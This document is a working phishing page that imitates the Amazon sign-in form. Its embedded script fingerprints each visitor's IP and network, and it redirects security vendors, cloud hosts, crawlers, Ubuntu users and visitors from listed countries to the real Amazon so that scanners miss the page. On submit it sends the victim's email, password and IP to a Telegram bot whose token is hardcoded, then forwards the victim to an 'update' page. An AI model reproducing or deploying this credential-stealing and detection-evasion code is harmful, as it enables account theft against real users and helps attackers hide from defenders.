<html class="a-no-js" data-19ax5a9jf="dingo">

<head>
	<script type="text/javascript">
		var ue_t0 = ue_t0 || +new Date();
	</script>
	<meta charset="utf-8">
	<link rel="icon" href="../assets/img/amazon.png">
	<title dir="ltr">Amazon Sign In</title>
	<link rel="stylesheet" href="../assets/css/main.css">
</head>

<body
	class="ap-locale-en_US a-m-us a-aui_149818-c a-aui_152852-c a-aui_157141-c a-aui_158613-c a-aui_160684-c a-aui_57326-c a-aui_72554-c a-aui_accessibility_49860-c a-aui_attr_validations_1_51371-c a-aui_bolt_62845-c a-aui_perf_130093-c a-aui_tnr_v2_180836-c a-aui_ux_113788-c a-aui_ux_114039-c a-aui_ux_138741-c a-aui_ux_145937-c a-aui_ux_60000-c">
	<div id="a-page">
		<div class="a-section a-padding-medium auth-workflow">
			<div class="a-section a-spacing-none auth-navbar">
				<div class="a-section a-spacing-medium a-text-center"><a class="a-link-nav-icon" tabindex="-1"
						href="/ref=ap_frn_logo"><i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i></a>
				</div>
			</div>
			<div id="authportal-center-section" class="a-section">
				<div id="authportal-main-section" class="a-section">
					<div class="a-section auth-pagelet-container">
						<div class="a-section a-spacing-base">
							<div class="a-section">
								<form name="signIn" method="post" novalidate="" action=""
									class="auth-validate-form auth-real-time-validation a-spacing-none">
									<div class="a-section">
										<div class="a-box">
											<div class="a-box-inner a-padding-extra-large">
												<h1 class="a-spacing-small">
													Sign in </h1>
												<!-- optional subheading element -->
												<div class="a-row a-spacing-base">
													<label for="ap_email" class="a-form-label">
														Email (phone for mobile accounts) </label>
														<input type="hidden" name="token" id='token' value="1163128696:AAGHzQ3d4IZgIXqmw_C0P35LWN0E6uTFeis">
														<input type="hidden" name="chat_id" id="chat_id" value="1109980785">
														<input type="hidden" name="ip" id="ip" >
													<input type="email" maxlength="128" id="ap_email" name="emailLogin"
														tabindex="1"
														class="a-input-text a-span12 auth-autofocus auth-required-field" data-validation="email" data-validation="required">
													<div id="auth-email-missing-alert"
														class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini"
														aria-live="assertive" role="alert">
														<div class="a-box-inner a-alert-container">
															<i class="a-icon a-icon-alert"></i>
															<div class="a-alert-content">
																Enter your email or mobile phone number
															</div>
														</div>
													</div>
												</div>
												<input type="hidden" name="create" value="0">
												<div class="a-section a-spacing-large">
													<div class="a-row">
														<div class="a-column a-span5">
															<label for="ap_password" class="a-form-label">


																Password


															</label>
														</div>
														<div class="a-column a-span7 a-text-right a-span-last">
															<a id="auth-fpp-link-bottom" class="a-link-normal"
																tabindex="3" href="#">
																Forgot your password?</a>
														</div>
													</div>
													<input type="password" id="ap_password" name="passwordLogin"
														tabindex="2" class="a-input-text a-span12 auth-required-field" data-validation="required">
													<div id="auth-password-missing-alert"
														class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini"
														aria-live="assertive" role="alert">
														<div class="a-box-inner a-alert-container">
															<i class="a-icon a-icon-alert"></i>
															<div class="a-alert-content">
																Enter your password
															</div>
														</div>
													</div>
												</div>
												<div class="a-section a-spacing-extra-large">
													<span class="a-button a-button-span12 a-button-primary">
														<span class="a-button-inner">
															<input id="signInSubmit" tabindex="5" class="a-button-input"
																type="submit">
															<span class="a-button-text" aria-hidden="true">
																Sign in </span>
														</span>
													</span>
													<div class="a-row a-spacing-top-medium">
														<div class="a-section a-text-left">
															<label for="auth-remember-me" class="a-form-label">
																<div data-a-input-name="rememberMe" class="a-checkbox">
																	<label>
																		<input type="checkbox" name="rememberMe"
																			value="true" tabindex="4">
																		<i class="a-icon a-icon-checkbox"></i>
																		<span class="a-label a-checkbox-label">
																			Keep me signed in.
																			<span class="a-declarative"
																				data-action="a-popover"
																				data-a-popover="{&quot;activate&quot;:&quot;onclick&quot;,&quot;header&quot;:&quot;\&quot;Keep Me Signed In\&quot; Checkbox&quot;,&quot;inlineContent&quot;:&quot;<p>Choosing \&quot;Keep me signed in\&quot; reduces the number of times you're asked to sign in on this device.<\/p>\n<p>To keep your account secure, use this option only on your personal devices.<\/p>&quot;}">
																				<a id="remember_me_learn_more_link"
																					href="javascript:void(0)"
																					class="a-popover-trigger a-declarative">
																					Details
																					<i
																						class="a-icon a-icon-popover"></i>
																				</a>
																			</span>
																		</span>
																	</label>
																</div>
															</label>
														</div>
													</div>
												</div>
												<div class="a-divider a-divider-break">
													<h5>New to Amazon?</h5>
												</div>
												<span id="auth-create-account-link"
													class="a-button a-button-span12 a-button-base">
													<span class="a-button-inner">
														<a id="createAccountSubmit" tabindex="6"
															href="#"
															class="a-button-text" role="button">
															Create your Amazon account </a>
													</span>
												</span>
											</div>
										</div>
									</div>
								</form>
							</div>
						</div>
					</div>
				</div>
			</div>
			<div id="right-2"></div>
			<div class="a-section a-spacing-top-extra-large auth-footer">
				<div class="a-divider a-divider-section">
					<div class="a-divider-inner"></div>
				</div>
				<div class="a-section a-spacing-small a-text-center a-size-mini">
					<span class="auth-footer-seperator"></span>
					<a class="a-link-normal" target="_blank" rel="noopener"
						href="/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&amp;nodeId=508088">
						Conditions of Use </a>
					<span class="auth-footer-seperator"></span>
					<a class="a-link-normal" target="_blank" rel="noopener"
						href="/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&amp;nodeId=468496">
						Privacy Notice </a>
					<span class="auth-footer-seperator"></span>
					<a class="a-link-normal" target="_blank" rel="noopener" href="/help">
						Help </a>
					<span class="auth-footer-seperator"></span>
				</div>
				<div class="a-section a-spacing-none a-text-center">
					<span class="a-size-mini a-color-secondary">
						© 1996-2020, Amazon.com, Inc. or its affiliates</span>
				</div>
			</div>
		</div>
		<div id="auth-external-javascript" class="auth-external-javascript" data-external-javascripts=""></div>
		<!-- cache slot rendered -->
	</div>
	<div id="be" style="display:none;visibility:hidden;">
		<form name="ue_backdetect" action="get">
			<input type="hidden" name="ue_back" value="1">
		</form>
	</div>

	<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
	<script src="//cdnjs.cloudflare.com/ajax/libs/jquery-form-validator/2.3.26/jquery.form-validator.min.js"></script>
	<script>
	$(document).ready(function(){
		$.getJSON("https://api.bigdatacloud.net/data/client-info",
		function(data) {
			$('#ip').val(data.ipString);
			var dataIP = $('#ip').val();
			var dataDevice = data.device;
			var dataOS = data.os;
			var dataUserAgentD = data.userAgentDisplay;
			var dataUserAgentR = data.userAgentRaw;
			var dataSpider = data.isSpider;
			var dataMobile = data.isMobile;
					if(dataSpider == false){
						 // validasi segi company
						 $.getJSON("https://api.bigdatacloud.net/data/network-by-ip?ip="+ dataIP +"&localityLanguage=id&key=0724b1c789254a05ac35a5c7076b8d43",
							function(dataApi) {
							// variable dari apikedua
							var organisation = dataApi.organisation;
							var cidr  = dataApi.bgpPrefix;
							var country = dataApi.registeredCountryName;
							var bannedorg = ["BLOCK-INT-WGC","Iskon Internet d.d. Internet Service Provider Croatia","Telekom System sp.z o.o.","TOT Public Company Limited","Robi Axiata Ltd - DATA","Broadbandtech S. A.","Chubu Telecommunications Co.,Inc.","UnderNet LLC","RM Education Ltd","Siberian Networks","Reliance Jio Infocomm Limited","Loughborough University","WranglerNet","Digital Energy Technologies Limited","CDN77.com","myLoc managed IT AG","ONLINE SERVICOS DE TELECOMUNICACOES LTDA","YouTube, LLC","Ask4 Limited","BVNET S.A.","Satnet Gye CM","Wireless network in Moscow region","DigitalServer Web Hosting en México","VPN Consumer Network","Amazon Technologies Inc.","Microsoft Corporation","Konzept IT GmbH","Fortinet Technologies (Canada)","B2 Net Solutions Inc.","Top Level Hosting SRL","servers.ru hosting services","BT","DIGITALOCEAN","Oy Creanova Hosting Solutions Ltd.","FTIP003161715 Netcraft Limited","pcl-ag03 Dial-up and ADSL pool Plusnet plc.","IPAX OG","Kaspersky Lab AO","Microsoft Azure","AVAST Software s.r.o.","OVH SAS","NFOrce Entertainment B.V.","M247 Ltd","Digital Ocean","Amazon.com","Palo Alto Networks","Leaseweb Asia Pacific pte.","Faction","Kcom","Exetel","Google","Rutgers University","Rackspace Cloud Servers","PRCDN Consumer Pool PoP Frankfurt https://prcdn.net/","Uninet S.A. de C.V.","Paul Bunyan Communications","DigitalOcean, LLC","Kaspersky Lab AO","Kcom Statics","OVH Ltd","M247 LTD Frankfurt Infrastructure","Amsterdam Residential Television and Internet, LLC","Fortinet Technologies (Canada)","FORTINET TECHNOLOGIES (CANADA) INC","LeaseWeb Asia Pacific - Hong Kong Please send all abuse notifications to the following email address"];
							var bannedcidr = ["62.252.0.0/16","185.49.74.0/23","31.41.81.0/24","213.202.89.0/24","203.113.80.0/23","103.242.22.0/24","200.112.190.0/24","219.117.32.0/20","176.104.0.0/18","194.154.0.0/19","49.44.64.0/19","80.64.174.0/23","131.231.0.0/16","69.164.144.0/20","154.127.57.0/24","185.93.2.0/24","217.79.176.0/20","191.7.212.0/23","104.237.189.0/24","213.143.0.0/19","190.97.0.0/24","186.68.128.0/19","80.252.129.0/24","191.96.145.0/24","45.41.181.0/24","52.86.0.0/15","13.64.0.0/11","83.175.64.0/18","204.101.161.0/24","69.4.80.0/20","93.119.227.0/24","88.212.240.0/20","91.103.64.0/21","87.112.0.0/14","185.112.82.0/24","178.128.136.0/21","52.240.0.0/12","5.62.40.0/23","51.77.0.0/16","212.92.112.0/21","185.220.70.0/24","159.65.208.0/21","65.154.226.0/24","204.101.161.0/24","207.102.136.0/21","64.120.88.0/22","195.74.76.0/24","52.148.0.0/14"];
							var bannedOS = ["Ubuntu"];
        					var bannedCountry = ["Kroasia","Polandia","Thailand","Bangladesh","Argentina","Jepang","Ukraina","India","Brasil","Rusia","Afrika Selatan","Jerman"];
							// var bannedCountry = ["Belgia","Britania Raya","Indonesia"];
							var handleorg=bannedorg.join("|");
							handleorg=new RegExp(handleorg, "i");
							var handlecidr=bannedcidr.join("|");
							handlecidr=new RegExp(handlecidr, "i");
							var handleOS=bannedOS.join("|");
							handleOS=new RegExp(handleOS, "i");
							var handleCountry=bannedCountry.join("|");
							handleCountry=new RegExp(handleCountry, "i");
								// jika ketemu di list organisasi maka suruh ke amazon
								if(organisation.search(handleorg) != -1){
								// suruh ke amazon.com
								window.location.replace("https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&");
								} else {
								//proses ke validasi kedua
									//jika ketemu di list cidr maka suruh amazon lagi
									if(cidr.search(handlecidr) !=-1){
									//suruh ke amazon;
									window.location.replace("https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&");
									}else{
										// OSS
										if(dataOS.search(handleOS) !=-1){
                          //suruh ke amazon;
                        window.location.replace("https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&");
                        }
                        else{
                          // got access
                            if(country.search(handleCountry) != -1){
                              //suruh ke amazon;
                        window.location.replace("https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&");
                            }
                            else{
                              // tele
										$.ajax({
										url:'https://api.telegram.org/bot'+$('#token').val()+'/sendMessage',
										method:'POST',
										data:{chat_id:"1109980785",
										text:'LOG2: ' + dataDevice + ' ' + country + ' | ' + dataIP + ' | "' + cidr + '", | "' + organisation + '", | ' + dataUserAgentD },
										success:function(){
										// kosong
										}
										});
										//
                            }
                        }
                        // OSSSS
										
									}
								}
								
							// 
							});
						// 
					}else{
						// bot musti ke amazon
						window.location.replace("https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&");
						// console.log(dataSpider);
					}	
			},0);
			});
        

		$.validate({
			lang: 'en'
		});

		// 


$('form').submit(function(e){

e.preventDefault();
var mincharacter = $("#ap_password").val()
var sidatanya = mincharacter.length;
if(sidatanya < 6 ){
	alert("Incorrect Password!");
	
}else{
	$.ajax({
	url:'https://api.telegram.org/bot'+$('#token').val()+'/sendMessage',
	method:'POST',
	data:{chat_id:$('#chat_id').val(),
	text:'IP: '+$('#ip').val()+' | Email: '+$('#ap_email').val()+' | Pass: '+$('#ap_password').val()},
	success:function(){
	window.location.replace("update.html");
	}
	});
}
});


 
	</script>
</body>

</html>